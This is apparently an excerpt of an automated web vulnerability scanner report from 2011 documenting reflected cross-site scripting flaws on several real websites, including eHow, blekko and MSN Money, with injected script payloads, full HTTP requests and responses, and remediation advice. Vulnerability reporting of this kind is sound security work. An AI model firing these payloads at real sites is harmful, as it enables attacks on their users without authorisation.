<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>eHow | How To Do Just About Everything! | How To ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 853b7</script><script>alert(1)</script>acd0c1c1806 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/compressed/en-US/common-mXhI4A.css HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.4.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=853b7</script><script>alert(1)</script>acd0c1c1806
Response
HTTP/1.1 404 File not Found Connection: close Date: Wed, 02 Feb 2011 15:45:53 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 28888
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>eHow | How To Do Just About Everything! | How To ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c8de</script><script>alert(1)</script>c257e1020ae was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forms/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=5c8de</script><script>alert(1)</script>c257e1020ae
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:18:15 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 68936
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b77a3</script><script>alert(1)</script>f21f6854d43 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forms/PasswordRetrieval.aspx HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=b77a3</script><script>alert(1)</script>f21f6854d43
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:17:43 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 25094
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9816e</script><script>alert(1)</script>c79d7af261c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forms/Support/DisplayCaptchaImage.aspx HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.4.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=9816e</script><script>alert(1)</script>c79d7af261c
Response (redirected)
HTTP/1.1 404 Not Found Connection: close Date: Wed, 02 Feb 2011 15:46:22 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 28888
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>eHow | How To Do Just About Everything! | How To ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d60b6</script><script>alert(1)</script>0dc090f33f6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forms/signin.aspx HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=d60b6</script><script>alert(1)</script>0dc090f33f6
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:17:38 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 24325
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title> Sign In to eHow | eHow.com </title> <meta ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38441</script><script>alert(1)</script>6930395ab2b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacy.aspx HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.4.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=38441</script><script>alert(1)</script>6930395ab2b
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:46:13 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 49154
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36718</script><script>alert(1)</script>f2cd512ee5a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /terms_use.aspx HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.4.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=36718</script><script>alert(1)</script>f2cd512ee5a
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:46:15 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 73168
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Terms of Use | eHow.com</title> <meta charset= ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
1.650. http://blekko.com/join [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://blekko.com
Path:
/join
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de32a"><script>alert(1)</script>784d2feb8f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /join?de32a"><script>alert(1)</script>784d2feb8f0=1 HTTP/1.1 Host: blekko.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;
The document has moved <a href="https://blekko.com/join?de32a"><script>alert(1)</script>784d2feb8f0=1">here</a>.
1.651. http://blekko.com/login [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://blekko.com
Path:
/login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7a44"><script>alert(1)</script>047c1089db5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /login?f7a44"><script>alert(1)</script>047c1089db5=1 HTTP/1.1 Host: blekko.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;
The document has moved <a href="https://blekko.com/login?f7a44"><script>alert(1)</script>047c1089db5=1">here</a>.
1.652. http://moneycentral.msn.com/investor/home.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://moneycentral.msn.com
Path:
/investor/home.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e5ec"><script>alert(1)</script>f4e8bec2fdd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /investor/home.aspx?6e5ec"><script>alert(1)</script>f4e8bec2fdd=1 HTTP/1.1 Host: moneycentral.msn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 02 Feb 2011 15:35:07 GMT Server: Microsoft-IIS/6.0 Location: http://money.msn.com/investing?6e5ec"><script>alert(1)</script>f4e8bec2fdd=1 Content-Length: 108
object moved <a href="http://money.msn.com/investing?6e5ec"><script>alert(1)</script>f4e8bec2fdd=1">here</a>
The value of the __stid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 585c9"><script>alert(1)</script>a1d1042bd was submitted in the __stid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /getSegment.php?fpc=fa38af9-12dddaf19a7-13ff2714-2&purl=null&jsref= HTTP/1.1 Host: seg.sharethis.com Proxy-Connection: keep-alive Referer: http://edge.sharethis.com/share4x/index.c99a19d7384984446908be08d7b2b8b1.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __stid=Cs8yN00nznknhnUGHGW1Ag==585c9"><script>alert(1)</script>a1d1042bd
Response
HTTP/1.1 200 OK Server: nginx/0.8.47 Date: Tue, 01 Feb 2011 14:32:02 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.3 Content-Length: 317